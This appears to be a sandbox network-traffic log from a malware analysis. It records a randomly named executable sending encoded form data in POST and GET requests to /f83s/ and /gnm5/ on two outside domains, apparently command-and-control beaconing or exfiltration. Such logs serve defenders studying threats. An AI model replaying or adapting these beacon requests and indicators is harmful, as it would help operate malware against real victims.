                                                                            Dec 10, 2024 16:24:49.973323107 CET1236INData Raw: 20 20 20 20 20 20 3c 2f 74 68 3e 0a 20 20 20 20 20 20 3c 74 68 3e 0a 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 69 64 3d 22 73 65 61 72 63 68 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 50 61 74 68 20 4d 61 74 63 68 22 20 74 79 70 65 3d 22 73
                                                                            Data Ascii: </th> <th> <input id="search" placeholder="Path Match" type="search" name="path[]" /> </th> <th> </th> </tr> </thead> <tbody class='exact_matches' id='exact_matches'> </tbody> <tbody class='fuz


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            15192.168.2.549923216.40.34.41801400C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 10, 2024 16:24:51.378676891 CET1834OUTPOST /f83s/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.newhopetoday.app
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Cache-Control: max-age=0
                                                                            Content-Length: 1244
                                                                            Origin: http://www.newhopetoday.app
                                                                            Referer: http://www.newhopetoday.app/f83s/
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                            Data Raw: 55 54 4a 30 62 68 43 3d 59 67 32 71 35 6f 5a 2f 5a 6f 4b 6f 65 66 75 79 76 30 70 6b 74 33 31 39 70 36 73 64 67 47 49 55 72 43 59 30 58 4d 72 4e 62 37 78 6f 4d 7a 6d 5a 70 35 62 69 35 69 38 6f 4d 2f 62 39 49 72 37 47 54 48 36 33 44 71 52 67 70 38 36 4f 43 61 6a 55 77 68 6a 58 43 6f 5a 4d 47 38 6e 49 71 37 51 42 47 34 69 4c 2b 72 46 7a 4c 77 6c 68 45 52 76 33 6e 35 64 66 6d 45 34 54 67 71 5a 63 70 32 70 46 75 42 6d 53 71 70 57 6d 78 57 5a 7a 4d 6e 42 58 50 54 38 66 33 57 2b 52 70 52 63 69 51 68 59 52 53 46 62 48 52 4c 53 34 33 47 6d 51 59 5a 66 36 33 5a 49 62 76 75 4f 41 78 73 57 69 45 34 55 61 36 67 6d 39 37 45 4c 7a 36 33 37 2f 71 4d 75 42 50 43 37 4c 71 33 30 6b 7a 36 4e 6b 41 76 57 52 79 77 7a 6c 61 39 43 33 71 48 4c 36 52 57 32 62 38 59 38 4d 65 4e 48 6e 6a 37 4a 4b 54 7a 62 6b 4e 47 52 6c 68 37 62 34 2b 6e 42 6d 30 52 4d 2f 41 45 68 77 34 6d 30 63 43 2b 73 53 64 38 6b 48 59 5a 2b 47 68 4d 45 65 71 78 79 30 42 76 34 42 32 6e 56 67 7a 6e 65 73 48 51 4e 49 31 6e 4a 4c 64 6c 79 32 38 5a 34 53 37 36 [TRUNCATED]
                                                                            Data Ascii: UTJ0bhC=Yg2q5oZ/ZoKoefuyv0pkt319p6sdgGIUrCY0XMrNb7xoMzmZp5bi5i8oM/b9Ir7GTH63DqRgp86OCajUwhjXCoZMG8nIq7QBG4iL+rFzLwlhERv3n5dfmE4TgqZcp2pFuBmSqpWmxWZzMnBXPT8f3W+RpRciQhYRSFbHRLS43GmQYZf63ZIbvuOAxsWiE4Ua6gm97ELz637/qMuBPC7Lq30kz6NkAvWRywzla9C3qHL6RW2b8Y8MeNHnj7JKTzbkNGRlh7b4+nBm0RM/AEhw4m0cC+sSd8kHYZ+GhMEeqxy0Bv4B2nVgznesHQNI1nJLdly28Z4S76SFHI5PbuleQHe6AfauXAXgxTLM2kkENw9/DEpQX9xo/VxnXsAQDD7C6n++zKC5NoHIFTzn/EXpeoIo9nt+82lu+93Jf9QM9DKxytfxxNXYVJ5mn3DC8J+MpE66WPTk19aGj4TCVIgWkiMA18L9Z0gOoBMVltClpCS+Kc37+jVZadjrVZciy04WtJQ6yUrk6apAs4TajVbFXQxlLO6h/+ENktegiv7hP54wjp2eaDe6UBjCmdU5rhUht6G0Vg/nFJvzeIMt1JxU9qngaBAjO2VdcYItLwlgVy4fiuvcc4XT/YdZYfsc7CfpiiDrsawK5/zw6LD9nNOIVsTz1ayLQPMXntSRuj7j/tWPRZJSlb1p8lEOi9lrKOyPCk6MjNDjxjRm/nQn4FKbP8tStccT5vOjctPCnkL8qWs9Dk0bqBCupJW6tea+f/dmR4xfrxERQqEGS8yV3aH5Rd6+8O6dP0joqADwbVDEpXYZaCId8p7VXeW7tEqUJCjSe+ITYAJe+iUHvNQDMyPFy51jx0icgdeGdKbJyxSoHiJqpl/jPwNucXQi3IxDoFEvAZ1DCLJGql4U3H4RA9T+wNVd4sZrIuK0B6M6SrwneSIFG5VgegF2lv2OqvF+cE+KJgrRiq2QJ8tKUWTaIHnkGqVFVKiXqKvAGISMsV+3LYCG [TRUNCATED]
                                                                            Dec 10, 2024 16:24:52.580269098 CET1236INHTTP/1.1 404 Not Found
                                                                            content-type: text/html; charset=UTF-8
                                                                            x-request-id: 5325af3b-84a0-482b-ab46-c4e2842ab007
                                                                            x-runtime: 0.021576
                                                                            content-length: 18170
                                                                            connection: close
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <title>Action Controller: Exception caught</title> <style> body { background-color: #FAFAFA; color: #333; margin: 0px; } body, p, ol, ul, td { font-family: helvetica, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; } pre { font-size: 11px; white-space: pre-wrap; } pre.box { border: 1px solid #EEE; padding: 10px; margin: 0px; width: 958px; } header { color: #F0F0F0; background: #C52F24; padding: 0.5em 1.5em; } h1 { margin: 0.2em 0; line-height: 1.1em; font-size: 2em; } h2 { color: #C52F24; line-height: 25px; } .details { border: 1px solid #D0D0D0; border-radius: 4px; margin: 1em 0px; display: block; width: 978px; } .summary { padding: 8px 15px; border-bottom: 1px solid #D0D0D0; [TRUNCATED]
                                                                            Dec 10, 2024 16:24:52.580873966 CET1236INData Raw: 70 72 65 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 70 78 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 62 6f 78 2d 73 69 7a
                                                                            Data Ascii: pre { margin: 5px; border: none; } #container { box-sizing: border-box; width: 100%; padding: 0 1.5em; } .source * { margin: 0px; padding: 0px; } .source { border: 1px
                                                                            Dec 10, 2024 16:24:52.580885887 CET1236INData Raw: 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c 65 20 74 68 65 61 64 20 74 72 2e 62 6f 74 74 6f 6d 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c
                                                                            Data Ascii: } #route_table thead tr.bottom { border-bottom: none; } #route_table thead tr.bottom th { padding: 10px 0; line-height: 15px; } #route_table thead tr.bottom th input#search { -webkit-appearance: textfield; }
                                                                            Dec 10, 2024 16:24:52.583044052 CET1236INData Raw: 0a 20 20 20 20 76 61 72 20 74 6f 67 67 6c 65 53 65 73 73 69 6f 6e 44 75 6d 70 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 72 65 74 75 72 6e 20 74 6f 67 67 6c 65 28 27 73 65 73 73 69 6f 6e 5f 64 75 6d 70 27 29 3b 0a 20 20 20
                                                                            Data Ascii: var toggleSessionDump = function() { return toggle('session_dump'); } var toggleEnvDump = function() { return toggle('env_dump'); } </script></head><body><header> <h1>Routing Error</h1></header><div id="c
                                                                            Dec 10, 2024 16:24:52.583056927 CET1236INData Raw: 69 6f 6e 5f 64 69 73 70 61 74 63 68 2f 6d 69 64 64 6c 65 77 61 72 65 2f 73 68 6f 77 5f 65 78 63 65 70 74 69 6f 6e 73 2e 72 62 3a 33 33 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65
                                                                            Data Ascii: ion_dispatch/middleware/show_exceptions.rb:33:in `call&#39;</a><br><a class="trace-frames" data-frame-id="2" href="#">lograge (0.11.2) lib/lograge/rails_ext/rack/logger.rb:15:in `call_app&#39;</a><br><a class="trace-frames" data-frame-id="3" h
                                                                            Dec 10, 2024 16:24:52.585361958 CET1236INData Raw: 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 31 31 22 20 68 72 65 66 3d 22 23 22 3e 61 63 74 69 6f 6e 70 61 63 6b 20 28 35 2e 32 2e 36 29 20 6c 69 62 2f 61
                                                                            Data Ascii: a><br><a class="trace-frames" data-frame-id="11" href="#">actionpack (5.2.6) lib/action_dispatch/middleware/static.rb:127:in `call&#39;</a><br><a class="trace-frames" data-frame-id="12" href="#">rack (2.2.3) lib/rack/sendfile.rb:110:in `call&#
                                                                            Dec 10, 2024 16:24:52.585374117 CET1236INData Raw: 72 61 6d 65 2d 69 64 3d 22 31 22 20 68 72 65 66 3d 22 23 22 3e 61 63 74 69 6f 6e 70 61 63 6b 20 28 35 2e 32 2e 36 29 20 6c 69 62 2f 61 63 74 69 6f 6e 5f 64 69 73 70 61 74 63 68 2f 6d 69 64 64 6c 65 77 61 72 65 2f 73 68 6f 77 5f 65 78 63 65 70 74
                                                                            Data Ascii: rame-id="1" href="#">actionpack (5.2.6) lib/action_dispatch/middleware/show_exceptions.rb:33:in `call&#39;</a><br><a class="trace-frames" data-frame-id="2" href="#">lograge (0.11.2) lib/lograge/rails_ext/rack/logger.rb:15:in `call_app&#39;</a>
                                                                            Dec 10, 2024 16:24:52.587795019 CET1236INData Raw: 70 61 74 63 68 2f 6d 69 64 64 6c 65 77 61 72 65 2f 65 78 65 63 75 74 6f 72 2e 72 62 3a 31 34 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d
                                                                            Data Ascii: patch/middleware/executor.rb:14:in `call&#39;</a><br><a class="trace-frames" data-frame-id="11" href="#">actionpack (5.2.6) lib/action_dispatch/middleware/static.rb:127:in `call&#39;</a><br><a class="trace-frames" data-frame-id="12" href="#">r
                                                                            Dec 10, 2024 16:24:52.587806940 CET1236INData Raw: 2f 20 41 64 64 20 63 6c 69 63 6b 20 6c 69 73 74 65 6e 65 72 73 20 66 6f 72 20 61 6c 6c 20 73 74 61 63 6b 20 66 72 61 6d 65 73 0a 20 20 20 20 66 6f 72 20 28 76 61 72 20 69 20 3d 20 30 3b 20 69 20 3c 20 74 72 61 63 65 46 72 61 6d 65 73 2e 6c 65 6e
                                                                            Data Ascii: / Add click listeners for all stack frames for (var i = 0; i < traceFrames.length; i++) { traceFrames[i].addEventListener('click', function(e) { e.preventDefault(); var target = e.target; var frame_id = target
                                                                            Dec 10, 2024 16:24:52.590471983 CET1236INData Raw: 22 5f 70 61 74 68 22 20 74 69 74 6c 65 3d 22 52 65 74 75 72 6e 73 20 61 20 72 65 6c 61 74 69 76 65 20 70 61 74 68 20 28 77 69 74 68 6f 75 74 20 74 68 65 20 68 74 74 70 20 6f 72 20 64 6f 6d 61 69 6e 29 22 20 68 72 65 66 3d 22 23 22 3e 50 61 74 68
                                                                            Data Ascii: "_path" title="Returns a relative path (without the http or domain)" href="#">Path</a> / <a data-route-helper="_url" title="Returns an absolute URL (with the http and domain)" href="#">Url</a> </th> <th> </th> <
                                                                            Dec 10, 2024 16:24:52.704040051 CET1236INData Raw: 6e 79 20 6d 61 74 63 68 65 64 20 72 65 73 75 6c 74 73 20 69 6e 20 61 20 73 65 63 74 69 6f 6e 0a 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 63 68 65 63 6b 4e 6f 4d 61 74 63 68 28 73 65 63 74 69 6f 6e 2c 20 6e 6f 4d 61 74 63 68 54 65 78 74 29 20 7b 0a
                                                                            Data Ascii: ny matched results in a section function checkNoMatch(section, noMatchText) { if (section.children.length <= 1) { section.innerHTML += noMatchText; } } // get JSON from URL and invoke callback with result f


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            16192.168.2.549934216.40.34.41801400C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 10, 2024 16:24:54.044536114 CET536OUTGET /f83s/?Pt=fDlHoNWP0RBd&UTJ0bhC=VieK6f8ncaDfGPivzEEx/UZGk95Gg2UmvQp6RJCzQOx2HiGD45aR4i1hBpXETM6WRWeDEM4UlZawI5DKshaxB7d7bPT0ms8iN9yo/alCEGhGDXP2xLsxmillvf5/o1Iesw== HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Host: www.newhopetoday.app
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                            Dec 10, 2024 16:24:55.166249990 CET1236INHTTP/1.1 200 OK
                                                                            x-frame-options: SAMEORIGIN
                                                                            x-xss-protection: 1; mode=block
                                                                            x-content-type-options: nosniff
                                                                            x-download-options: noopen
                                                                            x-permitted-cross-domain-policies: none
                                                                            referrer-policy: strict-origin-when-cross-origin
                                                                            content-type: text/html; charset=utf-8
                                                                            etag: W/"489b1cc03742192cd82a546616d2ba37"
                                                                            cache-control: max-age=0, private, must-revalidate
                                                                            x-request-id: b3602359-efe6-4f2f-bfc8-002e06972a23
                                                                            x-runtime: 0.005239
                                                                            transfer-encoding: chunked
                                                                            connection: close
                                                                            Data Raw: 31 37 35 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 27 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 33 43 62 61 56 76 77 2d 49 37 4d 6c 72 6d 6d 6d 48 7a 30 62 66 62 6b 6f 37 6f 4d 43 57 31 6d 6e 32 75 36 35 75 57 73 57 57 42 38 27 20 6e 61 6d 65 3d 27 67 6f 6f 67 6c 65 2d 73 69 74 65 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 27 20 6e 61 6d 65 3d 27 76 69 65 77 70 6f 72 74 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 27 20 6e 61 6d 65 3d 27 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 27 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 64 61 74 61 [TRUNCATED]
                                                                            Data Ascii: 1759<!DOCTYPE html><html><head><meta content='text/html; charset=UTF-8' http-equiv='Content-Type'><meta content='3CbaVvw-I7MlrmmmHz0bfbko7oMCW1mn2u65uWsWWB8' name='google-site-verification'><meta content='width=device-width, initial-scale=1.0' name='viewport'><meta content='telephone=no' name='format-detection'><link href='data:;base64,iVBORw0KGgo=' rel='icon'><title>newhopetoday.app is coming soon</title><link rel="stylesheet" media="screen" href="https://fonts.googleapis.com/css?family=Open+Sans:300,400,600,700" /><link rel="stylesheet" media="all" href="/assets/application-2f7e7f30d812d0f3950918c7562df7e68eeeebd8649bdea2bc3844eb07fc8269.css" /></head><body><header><a rel="nofollow" href="https://www.hover.com/?source=p
                                                                            Dec 10, 2024 16:24:55.166932106 CET1236INData Raw: 61 72 6b 65 64 22 3e 3c 69 6d 67 20 77 69 64 74 68 3d 22 31 30 32 22 20 68 65 69 67 68 74 3d 22 33 30 22 20 73 72 63 3d 22 2f 61 73 73 65 74 73 2f 68 76 5f 6c 6f 67 6f 5f 72 65 74 69 6e 61 2d 36 61 32 62 61 38 33 35 30 39 30 37 64 34 61 31 37 62
                                                                            Data Ascii: arked"><img width="102" height="30" src="/assets/hv_logo_retina-6a2ba8350907d4a17bfc7863c2f1378e38a53bd22b790c69c14143b0f9ce45ca.png" /></a></header><main><h1>newhopetoday.app</h1><h2>is a totally awesome idea still being worked on.</h2><
                                                                            Dec 10, 2024 16:24:55.166944027 CET1236INData Raw: 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 6f 76 65 72 2e 63 6f 6d 2f 61 62 6f 75 74 3f 73 6f 75 72 63 65 3d 70 61 72 6b 65 64 22 3e 41 62 6f 75 74 20 55 73 3c 2f 61 3e 3c 2f 6c 69 3e
                                                                            Data Ascii: rel="nofollow" href="https://www.hover.com/about?source=parked">About Us</a></li><li><a rel="nofollow" href="https://help.hover.com/home?source=parked">Help</a></li><li><a rel="nofollow" href="https://www.hover.com/tools?source=parked">Your
                                                                            Dec 10, 2024 16:24:55.169370890 CET1236INData Raw: 33 35 2e 31 38 36 39 36 2c 31 35 2e 37 35 33 36 35 20 2d 33 35 2e 31 38 36 39 36 2c 33 35 2e 31 38 35 32 35 20 30 2c 32 2e 37 35 37 38 31 20 30 2e 33 31 31 32 38 2c 35 2e 34 34 33 35 39 20 30 2e 39 31 31 35 35 2c 38 2e 30 31 38 37 35 20 2d 32 39
                                                                            Data Ascii: 35.18696,15.75365 -35.18696,35.18525 0,2.75781 0.31128,5.44359 0.91155,8.01875 -29.24344,-1.46723 -55.16995,-15.47582 -72.52461,-36.76396 -3.02879,5.19662 -4.76443,11.24048 -4.76443,17.6891 0,12.20777 6.21194,22.97747 15.65332,29.28716 -5.7677
                                                                            Dec 10, 2024 16:24:55.169384003 CET1236INData Raw: 39 20 31 31 35 74 32 37 39 20 2d 31 31 35 74 31 31 35 20 2d 32 37 39 7a 4d 31 32 37 30 20 31 30 35 30 71 30 20 2d 33 38 20 2d 32 37 20 2d 36 35 74 2d 36 35 20 2d 32 37 74 2d 36 35 20 32 37 74 2d 32 37 20 36 35 74 32 37 20 36 35 74 36 35 20 32 37
                                                                            Data Ascii: 9 115t279 -115t115 -279zM1270 1050q0 -38 -27 -65t-65 -27t-65 27t-27 65t27 65t65 27t65 -27t27 -65zM768 1270 q-7 0 -76.5 0.5t-105.5 0t-96.5 -3t-103 -10t-71.5 -18.5q-50 -20 -88 -58t-58 -88q-11 -29 -18.5 -71.5t-10 -103t-3 -96.5t0 -105.5t0.5 -76.5t
                                                                            Dec 10, 2024 16:24:55.171355009 CET299INData Raw: 31 2a 6e 65 77 20 44 61 74 65 28 29 3b 61 3d 73 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 6f 29 2c 0a 20 20 6d 3d 73 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 6f 29 5b 30 5d 3b 61 2e 61 73 79 6e 63 3d 31 3b 61 2e 73 72
                                                                            Data Ascii: 1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-4171338-43', 'auto'); g


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            17192.168.2.5499453.33.130.190801400C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 10, 2024 16:25:00.930907011 CET797OUTPOST /gnm5/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.binacamasala.com
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Cache-Control: max-age=0
                                                                            Content-Length: 208
                                                                            Origin: http://www.binacamasala.com
                                                                            Referer: http://www.binacamasala.com/gnm5/
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                            Data Raw: 55 54 4a 30 62 68 43 3d 67 67 53 66 54 2b 52 31 36 55 4c 72 71 39 4f 6e 76 76 73 71 73 32 77 77 51 70 30 38 43 75 75 42 6c 57 47 4e 38 68 51 33 6d 50 46 75 66 34 67 42 33 52 6c 71 64 50 6a 73 52 53 37 71 75 64 35 6a 70 4d 4d 39 6a 66 66 4d 55 76 6d 37 74 30 31 2b 4d 45 61 31 67 44 50 76 42 57 79 38 56 6d 42 59 6b 45 76 74 55 7a 4b 4d 49 7a 2f 44 6c 4c 54 43 74 59 74 47 4b 52 64 2f 4c 5a 51 54 36 47 59 73 35 34 46 59 6e 42 6a 35 59 4d 62 33 66 46 51 33 77 68 77 37 48 5a 34 43 68 2f 6a 79 32 45 41 6a 5a 4d 70 37 69 47 65 78 39 50 2b 75 57 74 57 47 69 50 35 6b 57 4f 34 7a 73 6a 78 51 68 6a 47 47 73 57 58 58 50 76 55 3d
                                                                            Data Ascii: UTJ0bhC=ggSfT+R16ULrq9Onvvsqs2wwQp08CuuBlWGN8hQ3mPFuf4gB3RlqdPjsRS7qud5jpMM9jffMUvm7t01+MEa1gDPvBWy8VmBYkEvtUzKMIz/DlLTCtYtGKRd/LZQT6GYs54FYnBj5YMb3fFQ3whw7HZ4Ch/jy2EAjZMp7iGex9P+uWtWGiP5kWO4zsjxQhjGGsWXXPvU=


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            18192.168.2.5499553.33.130.190801400C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 10, 2024 16:25:03.597537041 CET817OUTPOST /gnm5/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.binacamasala.com
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Cache-Control: max-age=0
                                                                            Content-Length: 228
                                                                            Origin: http://www.binacamasala.com
                                                                            Referer: http://www.binacamasala.com/gnm5/
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                            Data Raw: 55 54 4a 30 62 68 43 3d 67 67 53 66 54 2b 52 31 36 55 4c 72 72 64 2b 6e 74 4d 45 71 34 6d 78 43 56 70 30 38 58 65 76 49 6c 57 61 4e 38 67 6b 64 6e 39 52 75 47 64 45 42 32 51 6c 71 51 76 6a 73 65 79 37 6a 6b 39 35 34 70 4d 52 41 6a 66 6a 4d 55 76 69 37 74 77 35 2b 4d 33 43 30 68 54 50 74 4b 32 79 2b 52 6d 42 59 6b 45 76 74 55 7a 50 68 49 7a 6e 44 6c 37 44 43 76 35 74 46 4a 52 64 2b 4f 5a 51 54 2b 47 5a 6c 35 34 45 4c 6e 41 76 54 59 4f 54 33 66 45 67 33 77 30 4d 34 53 70 34 45 76 66 69 34 2f 57 52 61 5a 2b 68 46 67 46 62 4d 39 4d 6d 4a 61 37 6e 73 34 74 78 4d 46 75 55 4c 38 77 35 6e 77 54 6e 76 32 31 48 6e 52 34 43 58 77 75 2f 2b 2f 52 55 48 71 42 55 4f 44 6b 4d 72 62 74 2b 51
                                                                            Data Ascii: UTJ0bhC=ggSfT+R16ULrrd+ntMEq4mxCVp08XevIlWaN8gkdn9RuGdEB2QlqQvjsey7jk954pMRAjfjMUvi7tw5+M3C0hTPtK2y+RmBYkEvtUzPhIznDl7DCv5tFJRd+OZQT+GZl54ELnAvTYOT3fEg3w0M4Sp4Evfi4/WRaZ+hFgFbM9MmJa7ns4txMFuUL8w5nwTnv21HnR4CXwu/+/RUHqBUODkMrbt+Q
                                                                            Dec 10, 2024 16:25:04.696904898 CET73INHTTP/1.1 405 Method Not Allowed
                                                                            content-length: 0
                                                                            connection: close


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            19192.168.2.5499613.33.130.190801400C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 10, 2024 16:25:06.272141933 CET1834OUTPOST /gnm5/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.binacamasala.com
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Cache-Control: max-age=0
                                                                            Content-Length: 1244
                                                                            Origin: http://www.binacamasala.com
                                                                            Referer: http://www.binacamasala.com/gnm5/
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
